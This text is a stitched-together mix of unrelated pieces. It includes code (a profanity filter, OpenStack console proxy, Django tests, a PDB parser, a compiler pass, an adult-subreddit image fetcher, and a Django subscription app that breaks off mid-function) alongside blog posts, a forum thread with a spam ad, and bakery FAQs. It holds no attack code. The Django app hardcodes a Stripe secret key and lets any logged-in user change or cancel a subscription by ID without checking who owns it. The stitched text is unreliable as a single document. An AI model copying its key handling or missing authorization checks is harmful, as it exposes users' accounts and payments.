regexps.keys() regexps = regexps.values() for i, regexp in enumerate(regexps): if re.search(regexp, word_info['word']): rule = regexp if keys: # dict rule set rule = list(keys)[i] rule = self._get_rule(rule) if accuse: word_info['is_good'] = False word_info['accuse'].append(rule) else: word_info['is_good'] = True word_info['excuse'].append(rule) if break_on_first: break class CensorRu(CensorBase): lang = 'ru' def _split_line(self, line): buf, result = '', [] line = re.sub(patterns.PAT_PUNCT2, ' ', re.sub(patterns.PAT_PUNCT1, '', line)) for word in re.split(patterns.PAT_SPACE, line): if len(word) < 3 and not re.match(self.lang_lib.patterns.PAT_PREP, word): buf += word else: if buf: result.append(buf) buf = '' result.append(word) if buf: result.append(buf) return result class CensorEn(CensorBase): lang = 'en' def _split_line(self, line): # have some differences from russian split_line buf, result = '', [] line = re.sub(patterns.PAT_PUNCT2, ' ', re.sub(patterns.PAT_PUNCT1, '', line)) for word in re.split(patterns.PAT_SPACE, line): if len(word) < 3: buf += word else: if buf: result.append(buf) buf = '' result.append(word) if buf: result.append(buf) return result class Censor: supported_langs = { 'ru': CensorRu, 'en': CensorEn, } @staticmethod def get(lang='ru', do_compile=True, **kwargs): if lang not in Censor.supported_langs: raise CensorException( 'Language {} is not yet in supported: {}. Please contribute ' 'to project to make it available'.format( lang, sorted(Censor.supported_langs.keys()))) return Censor.supported_langs[lang](do_compile=do_compile, **kwargs)
The Huffington Post’s World Post reports that Finland has adopted new standards for its National Core Curriculum similar to those of the Common Core in the United States. Under the new regulations, Finnish educators would no longer teach subjects like math, science, or history to students; instead, learning will be topical, meaning that lessons will be interdisciplinary and practical in nature. For example, a class on the European Union would combine elements of language, economics, history, and geography. As Finnish students consistently rank at the top of Program for International Student Assessment (PISA) tests, the new measure has attracted a lot of attention across the world. In the US, the same interdisciplinary and real-world criteria have been a part of the Common Core movement to enhance critical thinking and problem solving skills. The World Post article points out that the reforms align well with Howard Gardner’s multiple intelligences (MI) theory. By catering to different modes of instruction and incorporating various ways of approaching the same issues in the classroom, the standards implicitly acknowledge MI’s relevance to the educational experience.
# Copyright (c) 2010 OpenStack Foundation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Console Proxy Service.""" from oslo_log import log as logging import oslo_messaging as messaging from oslo_utils import importutils from nova.compute import rpcapi as compute_rpcapi import nova.conf from nova import exception from nova.i18n import _LI from nova import manager from nova import utils CONF = nova.conf.CONF LOG = logging.getLogger(__name__) class ConsoleProxyManager(manager.Manager): """Sets up and tears down any console proxy connections. Needed for accessing instance consoles securely. """ target = messaging.Target(version='2.0') def __init__(self, console_driver=None, *args, **kwargs): if not console_driver: console_driver = CONF.console_driver self.driver = importutils.import_object(console_driver) super(ConsoleProxyManager, self).__init__(service_name='console', *args, **kwargs) self.driver.host = self.host self.compute_rpcapi = compute_rpcapi.ComputeAPI() def reset(self): LOG.info(_LI('Reloading compute RPC API')) compute_rpcapi.LAST_VERSION = None self.compute_rpcapi = compute_rpcapi.ComputeAPI() def init_host(self): self.driver.init_host() def add_console(self, context, instance_id): instance = self.db.instance_get(context, instance_id) host = instance['host'] name = instance['name'] pool = self._get_pool_for_instance_host(context, host) try: console = self.db.console_get_by_pool_instance(context, pool['id'], instance['uuid']) except exception.NotFound: LOG.debug('Adding console', instance=instance) password = utils.generate_password(8) port = self.driver.get_port(context) console_data = {'instance_name': name, 'instance_uuid': instance['uuid'], 'password': password, 'pool_id': pool['id']} if port: console_data['port'] = port console = self.db.console_create(context, console_data) self.driver.setup_console(context, console) return console['id'] def remove_console(self, context, console_id): try: console = self.db.console_get(context, console_id) except exception.NotFound: LOG.debug('Tried to remove non-existent console ' '%(console_id)s.', {'console_id': console_id}) return self.db.console_delete(context, console_id) self.driver.teardown_console(context, console) def _get_pool_for_instance_host(self, context, instance_host): context = context.elevated() console_type = self.driver.console_type try: pool = self.db.console_pool_get_by_host_type(context, instance_host, self.host, console_type) except exception.NotFound: # NOTE(mdragon): Right now, the only place this info exists is the # compute worker's flagfile, at least for # xenserver. Thus we ned to ask. pool_info = self.compute_rpcapi.get_console_pool_info(context, console_type, instance_host) pool_info['password'] = self.driver.fix_pool_password( pool_info['password']) pool_info['host'] = self.host pool_info['public_hostname'] = CONF.console_public_hostname pool_info['console_type'] = self.driver.console_type pool_info['compute_host'] = instance_host pool = self.db.console_pool_create(context, pool_info) return pool
All that’s left to complete for my submission to The Sketchbook Project 2012 is to wrap up my journal into a safe package and send it off. Yes, I’ve finished the pages, scanned them, and over the next few days I will have the last handful of images color-corrected and posted to flickr. Yay! It is also a bit surprising–and kind of funny–that although I fully embraced the “monochromatic” theme, now that I am back to my personal journal, I am also back to color. I really love my water-soluble graphite pencils that I used though out my journal for The Sketchbook Project, and I have even created some personal journal pages with them. But I haven’t touched them for a few days now. Instead, I’ve been using many of the paints and inks (and crayons and pencils) that I put aside for the brief time I was working on my monochromatic pages. So, I guess it’s a “color correction” in it’s own way. Going back and forth between extremes–that achieves balance, right? Recently, I’ve seen a few artists online who have made Teesha Moore’s 16-page journal. That motivated me to post the instructions for Pam Carriker’s 12-page journal, although I haven’t posted a “how-to” here before. I like Pam’s journal because it’s a bit simpler, involves no measuring, uses the single sheet efficiently, and can easily be adapted to any size sheet. And it really does take only about ten minutes to make! I have made this type of journal twice, both times using 14×17 sheets of Strathmore drawing paper. (One is the Everyday Journal I posted on flickr: http://flic.kr/s/aHsjw2quTm.) I like to work small, but I think I will try making one from a 22×30 sheet next time. Some notes on the instructions: 1) Maybe you want to reverse steps 4 and 5 so that you don’t accidentally tear open the folds that are to be to the spine. 2) For heavier paper, wet the edges you will tear open; it makes it easier. 3) Want 24 pages? Just do the same steps with two sheets at once instead of one. I am almost finished with my submission for The 2012 Sketchbook Project! Hooray–just one more page to go! But whether I am intimidated or not, I generally follow rules; so I signed up and selected a theme from the list that was given without too much fuss. In many places on the website there were encouragements to use the themes as guides and suggestions, not limitations. I still felt a little uneasy. I had decided on “monochromatic,” since I felt that was safe–I could use it to influence my method or media, if not my subjects. After all, giving my sketchbook a theme–Hopes and Failures, The Worst Story Ever Told, or a similar one from the list of suggestions–would be to bare more than I am ready for. I take comfort in the fact that no one really knows what my doodles, collages, paintings, and journal pages are all about. Their response to anything I put out there remains just that–theirs. Yes, it’s more than a little ironic to sing into a microphone and hope that no one understands you, just like it doesn’t make any sense to post art online on this big,vast internet and then refuse to tell anyone what it’s really about. But we all cope in our own way. “Not Ideas About the Thing, But the Thing Itself” is a Wallace Steven poem that has fascinated me since I was first introduced to it in college. At the time, it was the most obscure poem I had ever read, and I just couldn’t figure it out. It was a “welcome to college where you’ll find out that you’re not as smart as you think you are” moment. It was a moment of authenticity. And authenticity is what I think of when I read that poem today; after all, we seem to live in a culture that is hungry for experiences that are direct, immediate, and most importantly, authentic. This has a good side: protesters across the world can take videos with cell phones and instantly upload them to the internet to show us what their totalitarian leaders are really up to. On the other hand, it means that “The Jersey Shore” and other reality shows like it are the most popular shows on television. I have no numbers to prove this, but instinct tells me that today more people read blogs than newspapers. There’s more–think of how few people write first novels anymore. They write memoirs instead. And think of how professional wrestling has lost the interest of many, while the UFC is growing. The first time I saw an UFC fight on TV, I told my husband (a blue belt in jiu-jitsu), “But it just looks like two guys in a street fight!” Exactly. Whereas professional wrestling is a performance, this stuff looks real. Our culture today rejects anything that seems too manufactured, too polished, too precious. We want the real thing. But what does this have to do with journals and art? I wonder that myself. It was a little less than 15 years ago when I first saw example of art journals at a presentation given by Tracy and Teesha Moore. The idea that you’d make art that is just for you–just like you’d write a diary that you never intended anyone else to read–and then show it, was so new that it was a shock to me. But now art journals and sketchbooks are hardly new; in fact, they seem to be all over. There’s the 1000 Journals Project. The Sketchbook Project. There are books and books of examples and how-to’s; there are websites, too. It used to be that artists’ sketchbooks were private places where they worked out the challenges of larger, finished pieces that were intended for a wider audience. The finished piece was “the real thing.” Today the opposite seems to be true–those raw, unfinished pages seem more real. More genuine. And so even if the popularity of “the Jersey Shore” makes me worry, more sketchbooks–and more art–in the world doesn’t. Last night, I tried to draw my hair. About a week ago, there was a Yahoo! story explaining that someone had spotted a three-inch-long scar just behind the hairline of Princess Kate by carefully looking at a close-up photo. The writer wondered what that scar could be from. Most of the comments on the story were to be expected (“Who cares?”, “Give her a break!”, and “So what if she’s not perfect!”). My own thought was: Three inches? That’s nothing–mine is almost 13! My second thought was that my hair would never, ever, give me away. That’s because my thick, wild, wavy, course hair–which has been my bane for most of my existence–keeps my secret for me. My hair hides the scar from my brain surgery completely: no one that I meet can see my scar, and it would take more than a chance close-up with a camera to reveal it. I can feel it there, but only because I have memorized its location. My scar will never tell the secret of my surgery (and even if it yelled, the sound would be muffled by the many, many layers of hair I have).
# coding=utf-8 from __future__ import print_function, unicode_literals from django.test import TestCase from oscar.core.compat import get_user_model from oscar_vat_moss.address.forms import UserAddressForm from oscar_vat_moss.address.models import Country User = get_user_model() class UserAddressFormTest(TestCase): def setUp(self): self.johndoe = get_user_model().objects.create_user('johndoe') self.hansmueller = get_user_model().objects.create_user('hansmueller') self.uk = Country.objects.create( iso_3166_1_a2='GB', name="UNITED KINGDOM") self.at = Country.objects.create( iso_3166_1_a2='AT', name="AUSTRIA") self.de = Country.objects.create( iso_3166_1_a2='DE', name="GERMANY") def test_valid_address(self): # Is a valid address identified correctly? data = dict( user=self.johndoe, first_name="John", last_name="Doe", line1="123 No Such Street", line4="Brighton", postcode="BN1 6XX", country=self.uk.iso_3166_1_a2, phone_number='+44 1273 555 999', ) form = UserAddressForm(self.johndoe, data) self.assertTrue(form.is_valid()) def test_missing_phone_number(self): # Is a valid address identified correctly? data = dict( user=self.johndoe, first_name="John", last_name="Doe", line1="123 No Such Street", line4="Brighton", postcode="BN1 6XX", country=self.uk.iso_3166_1_a2, ) form = UserAddressForm(self.johndoe, data) self.assertFalse(form.is_valid()) def test_valid_vatin(self): # Is a valid VATIN identified correctly? data = dict( user=self.hansmueller, first_name="Hans", last_name="Müller", line1="hastexo Professional Services GmbH", line4="Wien", postcode="1010", country=self.at.iso_3166_1_a2, vatin='ATU66688202', phone_number='+43 1 555 9999', ) form = UserAddressForm(self.hansmueller, data) self.assertTrue(form.is_valid()) def test_invalid_vatin(self): # Is an invalid VATIN identified correctly? data = dict( user=self.hansmueller, first_name="Hans", last_name="Müller", line1="hastexo Professional Services GmbH", line4="Wien", postcode="1010", country=self.at.iso_3166_1_a2, vatin='ATU99999999', ) form = UserAddressForm(self.hansmueller, data) self.assertFalse(form.is_valid()) def test_non_matching_vatin(self): # Is a VATIN that is correct, but doesn't match the company # name, identified correctly? data = dict( user=self.hansmueller, first_name="Hans", last_name="Müller", line1="Example, Inc.", line4="Wien", postcode="1010", country=self.at.iso_3166_1_a2, vatin='ATU66688202', ) form = UserAddressForm(self.hansmueller, data) self.assertFalse(form.is_valid()) def test_non_matching_country_and_phone_number(self): # Is an invalid combination of country and phone number # identified correctly? data = dict( user=self.hansmueller, first_name="Hans", last_name="Müller", line1="Example, Inc.", line4="Wien", postcode="1010", phone_number="+49 30 1234567", country=self.at.iso_3166_1_a2, ) form = UserAddressForm(self.hansmueller, data) self.assertFalse(form.is_valid()) def test_non_matching_address_and_phone_number(self): # Is an invalid combination of postcode and phone area code, # where this information would be relevant for a VAT # exception, identified correctly? data = dict( user=self.hansmueller, first_name="Hans", last_name="Müller", line1="Example, Inc.", # Jungholz is a VAT exception area where German, not # Austrian, VAT rates apply line4="Jungholz", # Correct postcode for Jungholz postcode="6691", # Incorrect area code (valid number, but uses Graz area # code) phone_number="+43 316 1234567", country=self.at.iso_3166_1_a2, ) form = UserAddressForm(self.hansmueller, data) self.assertFalse(form.is_valid())
Losing weight can be hard without any help. This is where we come in. We offer a FREE exclusive emiling newsletter to everyone on this forum for a limited time. We provide great health insights, FREE giveaways and advice. @HammH LOL! You mean because I posted a pic of myself AFTER having consumed 3 glasses of eggnog and 1 whole pie in the previous 2 weeks? And that I'd not been lifting weights in like 8 weeks? Meh: what's a little pride measured against a great opportunity to make a point about fitness? Hey Epster - Is that gausy looking thing on your hat a mosquito net? Wouldn't think you get many of them in Co. Also - Big congrats on the "good health" program and results. Never forget - you have been, are, always will be - A work in progress. @wilful LOL! I'm wearing one of those wrap-around visors. So my hair is pulled through the top. That gauze, then, is really just my bangs getting caught in the wind. But yeah, we get mosquitos here in the summer. We do carry nets for slipping over the head while hiking. Some summers are b a d. And thanks. It's been a fun and weird journey, all this changing. I'm about 3 pounds away from an entirely new wardrobe: even my smallest sized attire is beginning to hang on me. The best part: I feel like a 20-something. I sleep great, have a ton of energy, and no body parts complain when I move. And of course my vitals continue to be excellent. So yay! Do you want to know how many calories you burn walking one mile, two miles, or more? How much does your walking speed matter? Your weight and the distance you walk are the biggest factors in how many calories you burn while walking. A rule of thumb is that about 100 calories per mile are burned for an 180-pound person and 65 calories per mile are burned for a 120-pound person. Your walking speed matters less. If you use a Fitbit or other tracker you may see this information as you go. @ReTiReD51 One of the great things about walking is that it is free. No membership, no special equipment. Just start walking. If you’re able walking is a perfect exercise because you can do it anywhere. @nyadrnsuggests set your own goal only you know “what motivates” you. Remember any number of steps walking is better than none. Good advice by both ladies. Walking your dog is a fun way to increase your daily steps.
""" Handle PDB files. """ __author__ = "Steven Kearnes" __copyright__ = "Copyright 2014, Stanford University" __license__ = "BSD 3-clause" from collections import OrderedDict class PdbReader(object): """ Handle PDB files. Also supports conversion from PDB to Amber-style PQR files. """ def parse_atom_record(self, line): """ Extract fields from a PDB ATOM or HETATM record. See http://deposit.rcsb.org/adit/docs/pdb_atom_format.html. Parameters ---------- line : str PDB ATOM or HETATM line. """ assert line.startswith('ATOM') or line.startswith('HETATM') fields = OrderedDict() fields['record_name'] = line[:6] fields['serial_number'] = int(line[6:11]) fields['atom_name'] = line[12:16] fields['alternate_location'] = line[16] fields['residue_name'] = line[17:20] fields['chain'] = line[21] fields['residue_number'] = int(line[22:26]) fields['insertion_code'] = line[26] fields['x'] = float(line[30:38]) fields['y'] = float(line[38:46]) fields['z'] = float(line[46:54]) # parse additional fields fields.update(self._parse_atom_record(line)) # strip extra whitespace from fields for key in fields.keys(): try: fields[key] = fields[key].strip() except AttributeError: pass return fields def _parse_atom_record(self, line): """ Parse optional fields in ATOM and HETATM records. Parameters ---------- line : str PDB ATOM or HETATM line. """ fields = OrderedDict() try: fields['occupancy'] = float(line[54:60]) fields['b_factor'] = float(line[60:66]) fields['segment'] = line[72:76] fields['element'] = line[76:78] fields['charge'] = line[78:80] except IndexError: pass return fields def pdb_to_pqr(self, pdb, charges, radii): """ Convert PDB to Amber-style PQR by adding charge and radius information. See p. 68 of the Amber 14 Reference Manual. Parameters ---------- pdb : file_like PDB file. charges : array_like Atomic partial charges. radii : array_like Atomic radii. """ # only certain PDB fields are used in the Amber PQR format pdb_fields = ['record_name', 'serial_number', 'atom_name', 'residue_name', 'chain', 'residue_number', 'x', 'y', 'z'] i = 0 pqr = '' for line in pdb: if line.startswith('ATOM') or line.startswith('HETATM'): fields = self.parse_atom_record(line) # charge and radius are added after x, y, z coordinates pqr_fields = [] for field in pdb_fields: value = fields[field] if value == '': value = '?' pqr_fields.append(str(value)) pqr_fields.append(str(charges[i])) pqr_fields.append(str(radii[i])) line = ' '.join(pqr_fields) + '\n' i += 1 # update atom count pqr += line # check that we covered all the atoms assert i == len(charges) == len(radii) return pqr
May 28 is not any ordinary day! It’s National Hamburger Day! Okay. Okay. I know I’m a few days early, but it’s best to be prepared! You might as well mark it on your calendars now! In fact, the whole month of May is National Hamburger Month. Obviously, National Hamburger Day being on May 28 is the perfect way to end the month, so why not enjoy a delicious burger? Did you know? Americans eat almost 50 billion burgers a year – that’s the equivalent of three burgers a week for every person in the United States! So, I figured in spirit of National Hamburger Day, I would name five of the best burgers I’ve ever had in Lexington and where you can find them, so you can eat one and celebrate this glorious day! The KY Bourbon Burger was the Winner of the 2015 Taste of the Bluegrass. I remember the first time I tried this burger! Back in 2016, I attended an event put on by The Bourbon Social called Beer, Bourbon, and Bacon Garden Party. It was held at the beautiful Ashland, The Henry Clay Estate. This burger happened to be one of the dishes there! Lexington Diner and Creative Table Kitchen and Catering catered it. At the event, sliders were served instead of a normal sized burger. This burger was so delicious that I knew I had to go to Lexington Diner and order the full-sized burger. What’s on the KY Bourbon Burger you ask? This burger has bourbon BBQ, applewood bacon, ghost pepper jack, and fried onion straws. Yes, it has ghost pepper! Don’t let that scare you off! But I’ll have to warn you – it does give the burger a lot of heat! Minglewood is a great restaurant off of North Limestone located in the heart of downtown. Last year I had this burger during Lexington Eats Week (This was to replace Lexington Restaurant Week, which had lost a key sponsor at the last minute. Don’t worry though! Lexington Restaurant Week is back and is happening this year on July 26 to August 4). I’m a sucker for a great burger, so when I saw Minglewood’s Noli Burger on their menu, I knew I had to order it! The Noli Burger has melted brie and bacon and bourbon orange marmalade. It’s ooey and gooey and extremely messy, but oh so good! It’s probably one of the best (if not the best) burger that I’ve eaten! I obviously couldn’t write a post about my favorite burgers and National Hamburger Day without mentioning Bad Wolf Burgers. There are tons of different options, so you could try something new every time you go! One of my favorites is the Bill Meck Burger, which has peanut butter and bacon. It may sound weird, but trust me, it works! I must have a knack for choosing the messiest burgers to eat, but I’ve found those to be the most delicious! The Bourbon Barrel Deluxe Burger from Windy Corner Market isn’t any different. It has everything a person could love – it’s a 1/3 pound patty with Bourbon Bacon Jam, their own Bourbon Barbecue Sauce, and Bourbon Barrel Beer Cheese (as well as lettuce, tomato, and red onion). You can never go wrong with a good bourbon BBQ sauce! Just like the Noli Burger from Minglewood, I also tried the Swayze Burger from Al’s Bar during Lexington Eats Week. This burger was made by the chefs were The Epic Cure. Al’s Bar offered the Swayze Burger also during 2017’s Lexington Burger Week. This burger has Swiss and American cheeses, fried bologna, lettuce, tomato, onion, pickle, and Grippos. Grippos on a burger? Sign me up! Obviously, I can’t include every burger I’ve ever eaten on the list, nor have I been to every restaurant in Lexington. These were just five burgers that stood out above the rest among the ones that I have had. If you live in Lexington, please let me know what your favorite burger is and where I can eat it! I’m always looking to try new restaurants!
import sys from expression_walker import walk from pass_utils import BINOPS, UNOPS try: import gelpia_logging as logging import color_printing as color except ModuleNotFoundError: sys.path.append("../") import gelpia_logging as logging import color_printing as color logger = logging.make_module_logger(color.cyan("lift_consts"), logging.HIGH) def pass_lift_consts(exp, inputs): """ Extracts constant values from an expression """ CONST = {"Const", "ConstantInterval", "Integer", "Float", "SymbolicConst"} NON_CONST_UNOPS = {"sinh", "cosh", "tanh", "dabs", "datanh", "floor_power2", "sym_interval"} consts = dict() hashed = dict() def make_constant(exp): if exp[0] == "Const": assert(exp[1] in consts) return exp try: key = hashed[exp] assert(logger("Found use of existing const {}", key)) except KeyError: key = "$_const_{}".format(len(hashed)) assert(exp not in hashed) hashed[exp] = key assert(key not in consts) consts[key] = exp assert(logger("Lifting const {} as {}", exp, key)) return ('Const', key) def _expand_positive_atom(work_stack, count, exp): work_stack.append((True, count, (*exp, True))) def _expand_negative_atom(work_stack, count, exp): assert(len(exp) == 2) work_stack.append((True, count, (exp[0], exp[1], False))) my_expand_dict = dict() my_expand_dict.update(zip(CONST, [_expand_positive_atom for _ in CONST])) my_expand_dict["Input"] = _expand_negative_atom def _pow(work_stack, count, args): assert(args[0] == "pow") assert(len(args) == 3) l, left = args[1][-1], args[1][:-1] r, right = args[2][-1], args[2][:-1] op = args[0] if right[0] != "Integer": op = "powi" if op == "pow": r = False # If both are constant don't consolidate yet status = False if l and r: status = True # Otherwise consolidate any arguments that are constant elif l: left = make_constant(left) elif r: right = make_constant(right) work_stack.append((True, count, (op, left, right, status))) def _two_item(work_stack, count, args): assert(len(args) == 3) l, left = args[1][-1], args[1][:-1] r, right = args[2][-1], args[2][:-1] op = args[0] # If both are constant don't consolidate yet status = False if l and r: status = True # Otherwise consolidate any arguments that are constant elif l: left = make_constant(left) elif r: right = make_constant(right) work_stack.append((True, count, (op, left, right, status))) def _tuple(work_stack, count, args): assert(args[0] == "Tuple") assert(len(args) == 3) l, left = args[1][-1], args[1][:-1] if len(args[2]) == 1: r, right = False, args[2] else: r, right = args[2][-1], args[2][:-1] op = args[0] if l: left = make_constant(left) if r: right = make_constant(right) work_stack.append((True, count, (op, left, right, False))) def _one_item(work_stack, count, args): assert(len(args) == 2) a, arg = args[1][-1], args[1][:-1] op = args[0] work_stack.append((True, count, (op, arg, a))) def _bad_one_item(work_stack, count, args): assert(len(args) == 2) a, arg = args[1][-1], args[1][:-1] op = args[0] if a: arg = make_constant(arg) work_stack.append((True, count, (op, arg, False))) def _box(work_stack, count, args): assert(args[0] == "Box") box = ["Box"] for sub in args[1:]: p, part = sub[-1], sub[:-1] if p: part = make_constant(part) box.append(part) box.append(False) work_stack.append((True, count, tuple(box))) def _return(work_stack, count, args): assert(args[0] == "Return") assert(len(args) == 2) r, retval = args[1][-1], args[1][:-1] if r: retval = make_constant(retval) return r, ("Return", retval) my_contract_dict = dict() my_contract_dict.update(zip(BINOPS, [_two_item for _ in BINOPS])) my_contract_dict.update(zip(UNOPS, [_one_item for _ in UNOPS])) my_contract_dict.update(zip(NON_CONST_UNOPS, [_bad_one_item for _ in NON_CONST_UNOPS])) my_contract_dict["Box"] = _box my_contract_dict["Tuple"] = _tuple my_contract_dict["pow"] = _pow my_contract_dict["Return"] = _return n, new_exp = walk(my_expand_dict, my_contract_dict, exp) assert(n in {True, False}) assert(type(new_exp) is tuple) assert(new_exp[0] not in {True, False}) return n, new_exp, consts def main(argv): logging.set_log_filename(None) logging.set_log_level(logging.HIGH) try: from function_to_lexed import function_to_lexed from lexed_to_parsed import lexed_to_parsed from pass_lift_inputs_and_inline_assigns import \ lift_inputs_and_inline_assigns from pass_utils import get_runmain_input from pass_simplify import simplify from pass_reverse_diff import reverse_diff data = get_runmain_input(argv) logging.set_log_level(logging.NONE) tokens = function_to_lexed(data) tree = lexed_to_parsed(tokens) exp, inputs = lift_inputs_and_inline_assigns(tree) exp = simplify(exp, inputs) d, diff_exp = reverse_diff(exp, inputs) diff_exp = simplify(diff_exp, inputs) logging.set_log_level(logging.HIGH) logger("raw: \n{}\n", data) const, exp, consts = pass_lift_consts(diff_exp, inputs) logger("inputs:") for name, interval in inputs.items(): logger(" {} = {}", name, interval) logger("consts:") for name, val in consts.items(): logger(" {} = {}", name, val) logger("expression:") logger(" {}", exp) logger("is_const: {}", const) return 0 except KeyboardInterrupt: logger(color.green("Goodbye")) return 0 if __name__ == "__main__": sys.exit(main(sys.argv))
Connect with Winter throughout February on the Knowledge Centre! Wiarton Willy may have predicted an early spring, but the reality is - regardless of what the prognosticating rodent had to say - it’s only the beginning of February and we’ve still got a lot of winter ahead of us! And while the weather outside might be frightful to some of us, don’t let that keep you inside! Throughout February, join the Canadian Wildlife Federation on the Knowledge Centre and explore your connection with winter and the many reasons to get outside when it’s #BelowZero. Join the discussion. Share your insights and experiences. Ask questions. Keep the conversation going - throughout February and beyond! Get Outside This Winter – For the Health of it!
import threading import queue import modules.loggers import logging from modules.tools import GetJson logger = logging.getLogger(__name__) porn_dict = dict() lock = threading.Lock() def Reddits(key): global porn_dict # un poco guarrete... if key in porn_dict.keys(): try: lock.acquire() content = porn_dict[key].pop()['data']['url'] logger.info('From {} len {} send {}'.format(key, len(porn_dict[key]), content)) lock.release() return content except IndexError as indexError: # lista vacia logger.warning(indexError) lock.release() q = queue.Queue() r = 'https://www.reddit.com' reddits = {'asians_gif': '/r/asian_gifs/.json?limit=100', 'anal': '/r/anal/.json?limit=100', 'asianhotties': '/r/asianhotties/.json?limit=100', 'AsiansGoneWild': '/r/AsiansGoneWild/.json?limit=100', 'RealGirls': '/r/RealGirls/.json?limit=100', 'wallpapers': '/r/wallpapers/.json?limit=100', 'fitnessgirls': ['/r/JustFitnessGirls/.json?limit=100','/r/HotForFitness/.json?limit=100']} urls = [] if key in reddits.keys(): if isinstance(reddits[key], str): urls.append(r + reddits[key]) else: for url in reddits[key]: urls.append(r + url) try: threads = [] for url in urls: t = threading.Thread(target=GetJson, args=(url,), kwargs=dict(queue=q), name=key) threads.append(t) t.start() data = list() for thread in threads: thread.join() result = q.get() data.extend(result['data']['children']) lock.acquire() porn_dict[key] = data content = porn_dict[key].pop()['data']['url'] lock.release() logger.info('send {}'.format(content)) return content except Exception as e: lock.release() logger.warning(e) return "An error ocurred :(" + e
What do you mean by "split filling"? At Ambrosia we thrive on serving the best quality products. What sets us apart from other bakeries is how we split the layers of cake and use a filling of your choice like buttercream icing or fruit fillings for example. Some of our cakes like the Fresh Strawberry Cake and many other Specialty Cakes are split twice and has filling between all four layers. To cut round cakes, move in two inches from the cake's outer edge; cut a circle and then slice approximately 1 1/2 inch pieces within the circle. Now move in another 2 inches, cut another circle, slice approximately 1 1/2 inch pieces and so on until the cake is completely cut. Note: 6 inch diameter cakes should be cut in wedges, without a center circle. Cut Petal and Hexagon cakes similar to round tiers. To cut square cakes, move in 2 inches from the outer edge and top to bottom. Then slice approximately 1 1/2 inch pieces of cake. Now move in another 2 inches and slice again until the entire cake is cut. Follow the diagrams below to cut sheet cakes (from 3 to 6 in. high), but adjust for the larger party-size slices. For cakes shorter than 3 in. you will need to cut wider slices to serve a proper portion. All Sheet cakes from The Ambrosia Bakery come as a “Single Layer Cake” that is split into two with a filling. That filling can be buttercream icing of any of the fruit or cream flavored fillings that we offer. Some fillings do have an additional charge.
from app.models import Address, Subscription from django.contrib.auth import authenticate, login, logout, update_session_auth_hash from django.contrib.auth.decorators import login_required from django.contrib.auth.models import User from django.http import HttpResponseRedirect from django.shortcuts import render from itertools import chain import stripe stripe.api_key = "sk_test_7omNc4LQGjHI7viCIxfGfIr5" def index(request): return render(request, 'app/index.html') def signup(request): if request.method == 'POST': context = {'fname': request.POST['fname'], 'lname': request.POST['lname'], 'email': request.POST['email'], 'ship_addr': request.POST['shipaddr'], 'gift_addr': request.POST['giftaddr']} username = request.POST['username'] password = request.POST['password'] try: user = User.objects.create_user(username, context['email'], password) user.first_name = context['fname'] user.last_name = context['lname'] user.full_clean() user.save() user = authenticate(username=username, password=password) if user is not None: login(request, user) except Exception as e: print(e.message) context['user_exists'] = True return render(request, 'app/signup.html', context) shipping = Address(user=user, value=context['ship_addr'], personal=True) shipping.save() if len(context['gift_addr']) > 0: gift = Address(user=user, value=context['gift_addr']) gift.save() return HttpResponseRedirect('/') return render(request, 'app/signup.html') def signin(request): errors = {} if request.method == 'POST': username = request.POST['username'] password = request.POST['password'] user = authenticate(username=username, password=password) if user is not None: if user.is_active: login(request, user) if 'next' in request.GET: return HttpResponseRedirect(request.GET['next']) else: return HttpResponseRedirect('/') else: errors['disabled'] = True else: errors['invalid'] = True return render(request, 'app/signin.html', errors) def signout(request): logout(request) return HttpResponseRedirect('/signin/') @login_required def crate(request, plan): context = {'plan': plan, 'personal_addr': Address.objects.get(user=request.user, personal=True), 'gift_addrs': Address.objects.filter(user=request.user, personal=False)} if request.method == 'POST': subscription = None stripe_plan = 'startupcrate_monthly' if plan == '1' else 'startupcrate_quarterly' if 'recipient' in request.POST: recipient = request.POST['recipient'] address_id = request.POST['pastaddr'] address = None if int(address_id) > 0: address = Address.objects.get(pk=address_id) if not address: address = Address(user=request.user, value=request.POST['newaddr']) else: recipient = '{0} {1}'.format(request.user.first_name, request.user.last_name) address = context['personal_addr'] try: address.full_clean() address.save() subscription = Subscription(ship_address=address, recipient_name=recipient) subscription.full_clean() subscription.save() customer = stripe.Customer.create(source=request.POST['stripeToken'], plan=stripe_plan, email=request.POST['stripeEmail']) subscription.stripe_customer = customer['id'] subscription.save() return HttpResponseRedirect('/subscriptions/') except Exception as e: print(e.message) context['invalid'] = True if subscription: subscription.delete() return render(request, 'app/crate.html', context) @login_required def subscriptions(request): if request.method == 'POST': print(request.POST) address_id = request.POST['pastaddr'] address = None if int(address_id) > 0: address = Address.objects.get(pk=address_id) if not address: address = Address(user=request.user, value=request.POST['newaddr']) try: subscription = Subscription.objects.get(pk=request.POST['subscription_id']) address.full_clean() address.save() subscription.ship_address = address subscription.full_clean() subscription.save() except Exception as e: print(e.message) context = { 'personal_subs': Subscription.objects.filter( ship_address=Address.objects.filter(user=request.user, personal=True)), 'gift_addrs': Address.objects.filter(user=request.user, personal=False) } context['gift_subs'] = Subscription.objects.filter(ship_address__in=context['gift_addrs']) context['subscriptions'] = list(chain(context['personal_subs'], context['gift_subs'])) return render(request, 'app/subscriptions.html', context) @login_required def settings(request): context = {'ship_addr': Address.objects.get(user=request.user, personal=True)} if request.method == 'POST': username = request.user.get_username() password = request.POST['password'] if authenticate(username=username, password=password) is not None: if 'delete' in request.POST: user = request.user subs = Subscription.objects.filter(ship_address__in=Address.objects.filter(user=user)) for subscription in subs: subscription.stripe_cancel() logout(request) user.delete() return HttpResponseRedirect('/signup/') request.user.first_name = request.POST['fname'] request.user.last_name = request.POST['lname'] request.user.email = request.POST['email'] new_password = request.POST['newpass'] if len(new_password) >= 8: request.user.set_password(new_password) try: request.user.full_clean() request.user.save() update_session_auth_hash(request, request.user) context['ship_addr'].value = request.POST['shipaddr'] context['ship_addr'].full_clean() context['ship_addr'].save() except Exception as e: print(e.message) context['invalid_fields'] = True else: context['changes_saved'] = True else: context['invalid_credentials'] = True return render(request, 'app/settings.html', context) @login_required def change(request, subscription_id): try: subscription = Subscription.objects.get(pk=subscription_id) subscription.stripe_change_plan() except Exception as e: print(e) return HttpResponseRedirect('/subscriptions/') @login_required def cancel(request, subscription_id): try: subscription = Subscription.objects.get(pk=subscription_id) 